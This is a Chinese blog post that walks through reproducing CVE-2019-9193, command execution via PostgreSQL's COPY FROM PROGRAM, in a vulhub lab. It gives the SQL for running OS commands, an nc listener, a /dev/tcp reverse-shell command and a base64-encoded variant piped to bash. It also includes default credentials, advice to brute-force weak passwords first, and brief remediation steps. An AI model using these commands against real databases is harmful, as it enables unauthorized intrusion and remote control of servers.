【CVE】CVE-2019-9193:PostgreSQL 任意命令执行漏洞

最新推荐文章于 2024-06-18 11:01:11 发布
最新推荐文章于 2024-06-18 11:01:11 发布
阅读量3.7k 收藏 13
点赞数 2
分类专栏: CVE 文章标签: postgresql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43427482/article/details/126093316
版权
  • 起序:客户内网测试的时候遇到的,搭建一个环境,写个笔记记录一下。

一、靶场环境

使用的是 github 上的 vulhub 环境。PostgreSQL 版本为 10.7

请添加图片描述

1、任意命令执行

具有数据库服务器文件读取权限的攻击者可以利用此漏洞执行任意系统命令。

  • 从 9.3 版本开始,Postgres 新增了一个 COPY TO/FROM PROGRAM 功能,允许数据库的超级用户以及 pg_read_server_files 组中的任何用户执行操作系统命令。

漏洞利用前提:

  1. 需要登陆;
  2. 需要高权限;

所以要先弱口令爆破之后,然后查看是否是高权限。(对于PostgreSQL 来说,只有安装数据库时默认创建的超级用户 postgres,类似于 Linux上的root用户,拥有高权限。)

新建数据库用户:CREATE USER
新建数据库:CREATE DATABASE
删除数据库:DROP DATABASE
删除用户:DROP USER
撤销权限:REVOKE
赋权:GRANT

2、影响版本

受影响的版本(貌似更新版本无解)

  • PostgreSQL >= 9.3

二、漏洞利用

1、启动靶机

docker-compose up -d

请添加图片描述

注:当测试完成之后会用到 关闭靶机 的命令。不是现在就要使用的命令。

docker-compose down -v

2、Navicat 连接 PostgreSQL

账号密码:postgres:postgres

请添加图片描述

3、执行命令

右键 public,点击 新建查询

请添加图片描述

然后就是执行下面的这些命令。

-- 先删除你想要使用但是已经存在的表
DROP TABLE IF EXISTS cmd_exec;

-- 创建保存系统命令输出的表
CREATE TABLE cmd_exec(cmd_output text);

-- 执行系统命令利用特定函数
COPY cmd_exec FROM PROGRAM 'id'; 

-- 查看执行结果
SELECT * FROM cmd_exec;

请添加图片描述

4、实战拓展:反弹 shell

1、nc 监听

在 kali 中使用 nc 进行监听。

nc -lvvp 1314

请添加图片描述

2、执行反弹 shell 的命令
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM '/bin/bash -i >& /dev/tcp/192.168.2.130/1314 0>&1'; 
SELECT * FROM cmd_exec;

但是可以看出执行失败了,这种方法不行。

请添加图片描述

3、反弹失败

kali 也没有得到 shell。

请添加图片描述

4、编码解决

将反弹 shell 的命令 base64 编码一下。(下面的解码不用管)

# base64 编码前
/bin/bash -i >& /dev/tcp/192.168.2.130/1314 0>&1

# base64 编码后
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMi4xMzAvMTMxNCAwPiYxCg==

请添加图片描述

5、再次执行反弹 shell 的命令

这里的编码不仅仅限于 base64,其他编码形式也可以,主要是为了解决数据传输过程中的特殊字符被异常解析的问题。

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMi4xMzAvMTMxNCAwPiYxCg==" | base64 -d | bash'; 
SELECT * FROM cmd_exec;

请添加图片描述

6、反弹成功

请添加图片描述

三、漏洞修复

  1. pg_read_server_files,pg_write_server_files 和 pg_execute_server_program 角色涉及读取和写入具有大权限的数据库服务器文件。将此角色权限分配给数据库用户时,应慎重考虑;
  2. 增强密码的复杂度;
  3. 进行网络隔离,限制 IP 访问,只允许需要的 IP 连接;

如果对您有帮助,点个赞再走呗。

边扯边淡
关注
专栏目录
漏洞复现】PostgreSQL高权限命令执行(CVE-2019-9193)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-01 400
这个漏洞是一个版本漏洞从9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令利用的前提1、需要登录2、需要高权限所以要先弱口令爆破之后,然后查看是否是高权限。
postgre提权(CVE-2019-9193)
weixin_45701675的博客
11-18 1246
PostgreSQL是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。 提权利用的是漏洞CVE-2019-9193 CVE-2018-1058 本次演示CVE-2019-9193提权 复现步骤 开启测试环境 连接postgres 新建查询,执行 尝试读取敏感文件 cat /etc/passwd,低权限用户无权限查询 测试成功 ...
PostgreSQL 高权限命令执行漏洞CVE-2019-9193
SoulCat
05-27 4108
PostgreSQL 高权限命令执行漏洞CVE-2019-9193) 最美好的大概还是那些初识的日子,是对彼此不全然地了解又极度渴望了解的那段时光。 漏洞概述: PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执...
CVE-2019-9193PostgreSQL 高权限命令执行漏洞
m0_48520508的博客
01-20 889
0x00简介 PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。 PostgreSQL特点: Ø 支持WINDOWS、Linux、Solaris、macOS 、BSD。 Ø 支持文本、图像、视频、声音等 Ø 支持ACID、关联完整性、数据库事务、Unicode多国语言。 Ø 支持临时表,与物化视图 Ø 支持SQL的许多功
Web安全基础学习:SQL注入漏洞PostgreSql注入
最新发布
qq_51862722的博客
06-18 1273
SQL注入(SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
CVE-2019-9193 PostgreSQL 高权限命令执行漏洞
qq_51979295的博客
10-08 692
康复训练
PostgreSQL任意命令执行CVE-2019-9193
GalaxySpaceX的博客
07-03 918
PostgreSQL任意命令执行CVE-2019-9193
CVE-2019-9193PostgreSQL 高权限命令执行漏洞的复现
m0_69801663的博客
12-23 1145
CVE-2019-9193PostgreSQL 高权限命令执行漏洞
漏洞复现之PostgreSQL任意命令执行CVE-2019-9193
Blood_Pupil的博客
05-09 5574
PostgreSQL任意命令执行CVE-2019-9193PostgreSQL是当下最流行的数据库系统之一,它是 Mac OSX系统下常用的数据库,但是同时也提供Windows和Linux操作系统版本 今天,我将要给大家介绍一个PostgreSQL的鲜为人知的特性,这个特性允许数据库的特定用户在PostgreSQL环境中执行任意代码并且在PostgreSQL 9.3至最新版本(11.2)...
CVE-2019-9193(高权限远程命令执行漏洞)vulhub复现
qq_52279315的博客
05-17 620
vulhub靶场复现【postgresql
buuctf [Postgres]CVE-2019-9193
qq_1873822的博客
04-02 583
漏洞描述 PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。 PostgreSQL特点: 支持WINDOWS、Linux、Solaris、macOS 、BSD。 支持文本、图像、视频、声音等 支持ACID、关联完整性、数据库事务、Unicode多国语言。 支持临时表,与物化视图 支持SQL的许多功能,例如复杂的SQL查询
GIT-SHELL 沙盒绕过(CVE-2017-8386)
黑白的博客
12-23 1065
声明 好好学习,天天向上 漏洞描述 GIT-SHELL 沙盒绕过(CVE-2017-8386)导致任意文件读取、可能的任意命令执行漏洞。 影响范围 复现过程 使用vulhub /app/vulhub-master/git/CVE-2017-8386 使用docker启动 docker-compose build docker-compose up -d 先准备好id_rsa,这是ssh的私钥,作者已经帮我们准备好了,就在docker-compose文件一起的文件夹内,拷贝到kali中,执行下述命令 ch
PostgreSQL 高权限命令执行 (CVE-2019-9193)
qq_44657899的博客
10-08 1070
漏洞原理 PostgreSQL是当下最流行的数据库系统之一,它是 Mac OSX系统下最常用的数据库,但同时也提供了Windows及Linux操作系统版本。(Kali下Metasploit用的就是PostgreSQL数据库). 漏洞成因是因为PostgreSQL的特性允许数据库的特定用户在PostgreSQL环境中执行任意代码并且在PostgreSQL 9.3-11.2版本中这个特性是默认开启的。 从9.3版本开始PostgreSQL实现了COPY TO/FROM PROGRAM这个新的功能,它允许数.
CVE-20199193所谓的psql的提权漏洞
公众号shadow sock7
03-27 1258
来源:https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5 翻译:https://nosec.org/home/detail/2368.html 描述 PostgreSQL 从9.3到最新的11.2版本默认开启,影响L...
PostgreSQL 存在内存泄露漏洞CVE-2022-41862)
murphysec的博客
03-09 1121
PostgreSQL是一个由PostgreSQL组织开发的自由对象关系型数据库管理系统。 该项目的受影响版本存在内存泄漏漏洞。该漏洞是由于在建立连接时采用libpq库建立连接的客户端对于接收的字节长度没有限制所导致的。 当libpq客户端缓存了Kerberos凭据并且没有显式禁用选项gssencmode时,攻击者便可控制PostgreSQL服务器在建立Kerberos传输加密时发送一个未终止的字符串,致使libpq客户端过度读取接收缓冲区后面的数据,包括未初始化的字节。继而,将这些未初始化的字节与错误
PostgreSQL信息泄露漏洞
dengyun0792的博客
05-25 387
受影响系统:PostgreSQL PostgreSQL 9.4PostgreSQL PostgreSQL 9.3描述:BUGTRAQ ID: 74790CVE(CAN) ID: CVE-2015-3166 PostgreSQL是一款高级对象-关系型数据库管理系统,支持扩展的SQL标准子集。 PostgreSQL 9.3及9.4版本,函数snprintf()的替换实现中,没有检查下层...
PostgreSQL 高权限命令执行漏洞CVE-2019-9193)复现
技术超强的网络安全平台
08-01 384
PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。 PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。 进入目录
Postgresql漏洞合集
weixin_46626737的博客
07-03 894
需要超级管理员数据库用户(postgres)才可以,因为在9.3版本之后,默认得开启了COPY TO/FROM PROGRAM功能,可以让超级用户去执行任意系统命令。2.PostgreSQL 高权限命令执行漏洞CVE-2019-9193)1.PostgreSQL 提权漏洞CVE-2018-1058)漏洞版本:9.3-11.2。漏洞版本:9.3-10。
PostgreSQL 高权限命令执行漏洞复现(CVE-2019-9193)
又菜又爱倒腾的博客
10-29 1833
#PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)# 一、漏洞简介 PostgreSQL是功能强大的数据库软件,可在所有主要操作系统上运行,包括Linux,Windows,Mac OS X等。所公开的漏洞存在于命令“COPY TO / FROM PROGRAM”中,用于导入和导出数据。在“pg_read_server_files”组中的用户执行上述命令之后,可以获得数据库超级用户权限,从而执行任何系统命令。 二、漏洞影响 影响版本 PostgreSQL 9.3-11.2 三、产生原因
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-144391
07-14
你提到的 Jackson 最新反序列化漏洞CVE-2019-14361 和 CVE-2019-14439。这些漏洞都是与 Jackson 库中的反序列化功能相关的安全问题。 CVE-2019-14361 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.9.x 版本。 CVE-2019-14439 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.6.x 至 2.9.x 版本。 为了解决这些漏洞,建议开发人员尽快升级到最新版本的 Jackson-databind 库。另外,还可以考虑限制反序列化操作的使用,以减少潜在的风险。记住及时关注安全公告,并采取相应的措施来保护应用程序免受可能的攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

边扯边淡

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值